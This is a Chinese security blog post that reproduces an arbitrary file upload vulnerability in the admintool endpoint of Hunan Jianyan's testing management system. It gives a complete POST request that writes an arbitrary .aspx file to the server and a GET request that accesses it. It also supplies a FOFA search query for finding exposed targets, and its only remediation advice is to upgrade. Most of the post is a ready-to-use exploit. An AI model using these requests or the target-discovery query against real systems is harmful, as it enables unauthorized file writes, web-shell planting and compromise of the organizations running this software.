湖南建研检测系统 admintool接口任意文件上传漏洞复现 [附POC]

漏洞描述

本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintoo 接口存在任意文件上传漏洞

影响版本

湖南建研-检测系统

漏洞复现

上传文件数据包

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent
: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
​
filePath=log.aspx&fileContent=mht

2023-12-26T23:00:10.png

访问上传路径

GET /Scripts/log.aspx HTTP/1.1
Host: ip:port
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ASP.NET_SessionId=bsa1jkvxeyr14b5pvleerqr5
Accept-Encoding: gzip, deflate, br

2023-12-26T23:00:36.png

fofa语法

body="/Content/Theme/Standard/webSite/login.css"

修复建议

升级至最新版本

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容